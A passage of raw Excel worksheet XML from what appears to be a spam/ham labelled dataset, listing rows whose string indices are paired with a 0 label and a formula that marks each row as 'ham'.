      </c>
    </row>
    <row r="2296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2296" t="s">
        <v>1765</v>
      </c>
      <c r="B2296">
        <v>0</v>
      </c>
      <c r="C2296" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2297" t="s">
        <v>1766</v>
      </c>
      <c r="B2297">
        <v>0</v>
      </c>
      <c r="C2297" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2298" t="s">
        <v>1767</v>
      </c>
      <c r="B2298">
        <v>0</v>
      </c>
      <c r="C2298" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2299" t="s">
        <v>1768</v>
      </c>
      <c r="B2299">
        <v>0</v>
      </c>
      <c r="C2299" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2300" t="s">
        <v>1769</v>
      </c>
      <c r="B2300">
        <v>0</v>
      </c>
      <c r="C2300" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2301" t="s">
        <v>1770</v>
      </c>
      <c r="B2301">
        <v>0</v>
      </c>
      <c r="C2301" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2302" t="s">
        <v>1771</v>
      </c>
      <c r="B2302">
        <v>0</v>
      </c>
      <c r="C2302" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2303" t="s">
        <v>1772</v>
      </c>
      <c r="B2303">
        <v>0</v>
      </c>
      <c r="C2303" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2304" t="s">
        <v>1773</v>
      </c>
      <c r="B2304">
        <v>0</v>
      </c>
      <c r="C2304" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2305" t="s">
        <v>1774</v>
      </c>
      <c r="B2305">
        <v>0</v>
      </c>
      <c r="C2305" t="str">
        <f t="shared" si="35"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2306" t="s">
        <v>1775</v>
      </c>
      <c r="B2306">
        <v>0</v>
      </c>
      <c r="C2306" t="str">
        <f t="shared" ref="C2306:C2369" si="36">IF(B2306="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="2307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2307" t="s">
        <v>1776</v>
      </c>
      <c r="B2307">
        <v>0</v>
      </c>
      <c r="C2307" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2308" t="s">
        <v>1777</v>
      </c>
      <c r="B2308">
        <v>0</v>
      </c>
      <c r="C2308" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2309" t="s">
        <v>1778</v>
      </c>
      <c r="B2309">
        <v>0</v>
      </c>
      <c r="C2309" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2310" t="s">
        <v>1779</v>
      </c>
      <c r="B2310">
        <v>0</v>
      </c>
      <c r="C2310" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2311" t="s">
        <v>1780</v>
      </c>
      <c r="B2311">
        <v>0</v>
      </c>
      <c r="C2311" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2312" t="s">
        <v>1781</v>
      </c>
      <c r="B2312">
        <v>0</v>
      </c>
      <c r="C2312" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2313" t="s">
        <v>1782</v>
      </c>
      <c r="B2313">
        <v>0</v>
      </c>
      <c r="C2313" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2314" t="s">
        <v>1783</v>
      </c>
      <c r="B2314">
        <v>0</v>
      </c>
      <c r="C2314" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2315" t="s">
        <v>1784</v>
      </c>
      <c r="B2315">
        <v>0</v>
      </c>
      <c r="C2315" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2316" t="s">
        <v>1785</v>
      </c>
      <c r="B2316">
        <v>0</v>
      </c>
      <c r="C2316" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2317" t="s">
        <v>1786</v>
      </c>
      <c r="B2317">
        <v>0</v>
      </c>
      <c r="C2317" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2318" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2318" t="s">
        <v>1787</v>
      </c>
      <c r="B2318">
        <v>0</v>
      </c>
      <c r="C2318" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2319" t="s">
        <v>1788</v>
      </c>
      <c r="B2319">
        <v>0</v>
      </c>
      <c r="C2319" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2320" t="s">
        <v>1789</v>
      </c>
      <c r="B2320">
        <v>0</v>
      </c>
      <c r="C2320" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2321" t="s">
        <v>1790</v>
      </c>
      <c r="B2321">
        <v>0</v>
      </c>
      <c r="C2321" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2322" t="s">
        <v>1791</v>
      </c>
      <c r="B2322">
        <v>0</v>
      </c>
      <c r="C2322" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2323" t="s">
        <v>1792</v>
      </c>
      <c r="B2323">
        <v>0</v>
      </c>
      <c r="C2323" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2324" t="s">
        <v>1793</v>
      </c>
      <c r="B2324">
        <v>0</v>
      </c>
      <c r="C2324" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2325" t="s">
        <v>1794</v>
      </c>
      <c r="B2325">
        <v>0</v>
      </c>
      <c r="C2325" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2326" t="s">
        <v>1795</v>
      </c>
      <c r="B2326">
        <v>0</v>
      </c>
      <c r="C2326" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2327" t="s">
        <v>1796</v>
      </c>
      <c r="B2327">
        <v>0</v>
      </c>
      <c r="C2327" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2328" t="s">
        <v>1797</v>
      </c>
      <c r="B2328">
        <v>0</v>
      </c>
      <c r="C2328" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2329" t="s">
        <v>1798</v>
      </c>
      <c r="B2329">
        <v>0</v>
      </c>
      <c r="C2329" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2330" t="s">
        <v>1799</v>
      </c>
      <c r="B2330">
        <v>0</v>
      </c>
      <c r="C2330" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2331" t="s">
        <v>1800</v>
      </c>
      <c r="B2331">
        <v>0</v>
      </c>
      <c r="C2331" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2332" t="s">
        <v>1801</v>
      </c>
      <c r="B2332">
        <v>0</v>
      </c>
      <c r="C2332" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2333" t="s">
        <v>1802</v>
      </c>
      <c r="B2333">
        <v>0</v>
      </c>
      <c r="C2333" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2334" t="s">
        <v>1803</v>
      </c>
      <c r="B2334">
        <v>0</v>
      </c>
      <c r="C2334" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2335" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2335" t="s">
        <v>1804</v>
      </c>
      <c r="B2335">
        <v>0</v>
      </c>
      <c r="C2335" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2336" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2336" t="s">
        <v>1805</v>
      </c>
      <c r="B2336">
        <v>0</v>
      </c>
      <c r="C2336" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2337" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2337" t="s">
        <v>1806</v>
      </c>
      <c r="B2337">
        <v>0</v>
      </c>
      <c r="C2337" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2338" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2338" t="s">
        <v>1807</v>
      </c>
      <c r="B2338">
        <v>0</v>
      </c>
      <c r="C2338" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2339" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2339" t="s">
        <v>1808</v>
      </c>
      <c r="B2339">
        <v>0</v>
      </c>
      <c r="C2339" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2340" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2340" t="s">
        <v>1809</v>
      </c>
      <c r="B2340">
        <v>0</v>
      </c>
      <c r="C2340" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2341" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2341" t="s">
        <v>1810</v>
      </c>
      <c r="B2341">
        <v>0</v>
      </c>
      <c r="C2341" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2342" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2342" t="s">
        <v>1811</v>
      </c>
      <c r="B2342">
        <v>0</v>
      </c>
      <c r="C2342" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2343" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2343" t="s">
        <v>1812</v>
      </c>
      <c r="B2343">
        <v>0</v>
      </c>
      <c r="C2343" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2344" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2344" t="s">
        <v>1813</v>
      </c>
      <c r="B2344">
        <v>0</v>
      </c>
      <c r="C2344" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2345" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2345" t="s">
        <v>1814</v>
      </c>
      <c r="B2345">
        <v>0</v>
      </c>
      <c r="C2345" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2346" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2346" t="s">
        <v>1815</v>
      </c>
      <c r="B2346">
        <v>0</v>
      </c>
      <c r="C2346" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2347" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2347" t="s">
        <v>1816</v>
      </c>
      <c r="B2347">
        <v>0</v>
      </c>
      <c r="C2347" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2348" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2348" t="s">
        <v>1817</v>
      </c>
      <c r="B2348">
        <v>0</v>
      </c>
      <c r="C2348" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2349" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2349" t="s">
        <v>1818</v>
      </c>
      <c r="B2349">
        <v>0</v>
      </c>
      <c r="C2349" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2350" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2350" t="s">
        <v>1819</v>
      </c>
      <c r="B2350">
        <v>0</v>
      </c>
      <c r="C2350" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2351" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2351" t="s">
        <v>1820</v>
      </c>
      <c r="B2351">
        <v>0</v>
      </c>
      <c r="C2351" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2352" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2352" t="s">
        <v>1821</v>
      </c>
      <c r="B2352">
        <v>0</v>
      </c>
      <c r="C2352" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2353" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2353" t="s">
        <v>1822</v>
      </c>
      <c r="B2353">
        <v>0</v>
      </c>
      <c r="C2353" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2354" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2354" t="s">
        <v>1823</v>
      </c>
      <c r="B2354">
        <v>0</v>
      </c>
      <c r="C2354" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2355" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2355" t="s">
        <v>1824</v>
      </c>
      <c r="B2355">
        <v>0</v>
      </c>
      <c r="C2355" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2356" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2356" t="s">
        <v>1825</v>
      </c>
      <c r="B2356">
        <v>0</v>
      </c>
      <c r="C2356" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2357" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2357" t="s">
        <v>1826</v>
      </c>
      <c r="B2357">
        <v>0</v>
      </c>
      <c r="C2357" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2358" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2358" t="s">
        <v>1821</v>
      </c>
      <c r="B2358">
        <v>0</v>
      </c>
      <c r="C2358" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2359" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2359" t="s">
        <v>1827</v>
      </c>
      <c r="B2359">
        <v>0</v>
      </c>
      <c r="C2359" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2360" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2360" t="s">
        <v>1828</v>
      </c>
      <c r="B2360">
        <v>0</v>
      </c>
      <c r="C2360" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2361" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2361" t="s">
        <v>1829</v>
      </c>
      <c r="B2361">
        <v>0</v>
      </c>
      <c r="C2361" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2362" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2362" t="s">
        <v>1830</v>
      </c>
      <c r="B2362">
        <v>0</v>
      </c>
      <c r="C2362" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2363" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2363" t="s">
        <v>1831</v>
      </c>
      <c r="B2363">
        <v>0</v>
      </c>
      <c r="C2363" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2364" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2364" t="s">
        <v>1832</v>
      </c>
      <c r="B2364">
        <v>0</v>
      </c>
      <c r="C2364" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2365" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2365" t="s">
        <v>1833</v>
      </c>
      <c r="B2365">
        <v>0</v>
      </c>
      <c r="C2365" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2366" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2366" t="s">
        <v>1834</v>
      </c>
      <c r="B2366">
        <v>0</v>
      </c>
      <c r="C2366" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2367" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2367" t="s">
        <v>1835</v>
      </c>
      <c r="B2367">
        <v>0</v>
      </c>
      <c r="C2367" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2368" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2368" t="s">
        <v>1836</v>
      </c>
      <c r="B2368">
        <v>0</v>
      </c>
      <c r="C2368" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2369" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2369" t="s">
        <v>1837</v>
      </c>
      <c r="B2369">
        <v>0</v>
      </c>
      <c r="C2369" t="str">
        <f t="shared" si="36"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2370" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2370" t="s">
        <v>1838</v>
      </c>
      <c r="B2370">
        <v>0</v>
      </c>
      <c r="C2370" t="str">
        <f t="shared" ref="C2370:C2433" si="37">IF(B2370="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="2371" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2371" t="s">
        <v>1839</v>
      </c>
      <c r="B2371">
        <v>0</v>
      </c>
      <c r="C2371" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2372" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2372" t="s">
        <v>1840</v>
      </c>
      <c r="B2372">
        <v>0</v>
      </c>
      <c r="C2372" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2373" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2373" t="s">
        <v>1841</v>
      </c>
      <c r="B2373">
        <v>0</v>
      </c>
      <c r="C2373" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2374" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2374" t="s">
        <v>1842</v>
      </c>
      <c r="B2374">
        <v>0</v>
      </c>
      <c r="C2374" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2375" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2375" t="s">
        <v>1843</v>
      </c>
      <c r="B2375">
        <v>0</v>
      </c>
      <c r="C2375" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2376" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2376" t="s">
        <v>1844</v>
      </c>
      <c r="B2376">
        <v>0</v>
      </c>
      <c r="C2376" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2377" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2377" t="s">
        <v>1845</v>
      </c>
      <c r="B2377">
        <v>0</v>
      </c>
      <c r="C2377" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2378" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2378" t="s">
        <v>1846</v>
      </c>
      <c r="B2378">
        <v>0</v>
      </c>
      <c r="C2378" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2379" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2379" t="s">
        <v>1847</v>
      </c>
      <c r="B2379">
        <v>0</v>
      </c>
      <c r="C2379" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2380" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2380" t="s">
        <v>1848</v>
      </c>
      <c r="B2380">
        <v>0</v>
      </c>
      <c r="C2380" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2381" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2381" t="s">
        <v>1849</v>
      </c>
      <c r="B2381">
        <v>0</v>
      </c>
      <c r="C2381" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2382" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2382" t="s">
        <v>1850</v>
      </c>
      <c r="B2382">
        <v>0</v>
      </c>
      <c r="C2382" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2383" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2383" t="s">
        <v>1851</v>
      </c>
      <c r="B2383">
        <v>0</v>
      </c>
      <c r="C2383" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2384" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2384" t="s">
        <v>1852</v>
      </c>
      <c r="B2384">
        <v>0</v>
      </c>
      <c r="C2384" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2385" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2385" t="s">
        <v>1853</v>
      </c>
      <c r="B2385">
        <v>0</v>
      </c>
      <c r="C2385" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2386" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2386" t="s">
        <v>1854</v>
      </c>
      <c r="B2386">
        <v>0</v>
      </c>
      <c r="C2386" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2387" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2387" t="s">
        <v>1855</v>
      </c>
      <c r="B2387">
        <v>0</v>
      </c>
      <c r="C2387" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2388" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2388" t="s">
        <v>1856</v>
      </c>
      <c r="B2388">
        <v>0</v>
      </c>
      <c r="C2388" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2389" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2389" t="s">
        <v>1857</v>
      </c>
      <c r="B2389">
        <v>0</v>
      </c>
      <c r="C2389" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2390" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2390" t="s">
        <v>1858</v>
      </c>
      <c r="B2390">
        <v>0</v>
      </c>
      <c r="C2390" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2391" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2391" t="s">
        <v>1859</v>
      </c>
      <c r="B2391">
        <v>0</v>
      </c>
      <c r="C2391" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2392" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2392" t="s">
        <v>1860</v>
      </c>
      <c r="B2392">
        <v>0</v>
      </c>
      <c r="C2392" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2393" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2393" t="s">
        <v>1861</v>
      </c>
      <c r="B2393">
        <v>0</v>
      </c>
      <c r="C2393" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2394" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2394" t="s">
        <v>1862</v>
      </c>
      <c r="B2394">
        <v>0</v>
      </c>
      <c r="C2394" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2395" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2395" t="s">
        <v>1863</v>
      </c>
      <c r="B2395">
        <v>0</v>
      </c>
      <c r="C2395" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2396" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2396" t="s">
        <v>1864</v>
      </c>
      <c r="B2396">
        <v>0</v>
      </c>
      <c r="C2396" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2397" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2397" t="s">
        <v>1865</v>
      </c>
      <c r="B2397">
        <v>0</v>
      </c>
      <c r="C2397" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2398" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2398" t="s">
        <v>1866</v>
      </c>
      <c r="B2398">
        <v>0</v>
      </c>
      <c r="C2398" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2399" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2399" t="s">
        <v>1867</v>
      </c>
      <c r="B2399">
        <v>0</v>
      </c>
      <c r="C2399" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2400" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2400" t="s">
        <v>1868</v>
      </c>
      <c r="B2400">
        <v>0</v>
      </c>
      <c r="C2400" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2401" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2401" t="s">
        <v>1869</v>
      </c>
      <c r="B2401">
        <v>0</v>
      </c>
      <c r="C2401" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2402" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2402" t="s">
        <v>1870</v>
      </c>
      <c r="B2402">
        <v>0</v>
      </c>
      <c r="C2402" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2403" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2403" t="s">
        <v>1871</v>
      </c>
      <c r="B2403">
        <v>0</v>
      </c>
      <c r="C2403" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2404" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2404" t="s">
        <v>1872</v>
      </c>
      <c r="B2404">
        <v>0</v>
      </c>
      <c r="C2404" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2405" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2405" t="s">
        <v>1873</v>
      </c>
      <c r="B2405">
        <v>0</v>
      </c>
      <c r="C2405" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2406" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2406" t="s">
        <v>1874</v>
      </c>
      <c r="B2406">
        <v>0</v>
      </c>
      <c r="C2406" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2407" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2407" t="s">
        <v>1875</v>
      </c>
      <c r="B2407">
        <v>0</v>
      </c>
      <c r="C2407" t="str">
        <f t="shared" si="37"/>
        <v>ham</v>
      </c>
    </row>
    <row r="2408" spans="1:3" x14ac:dyDescent="0.3">
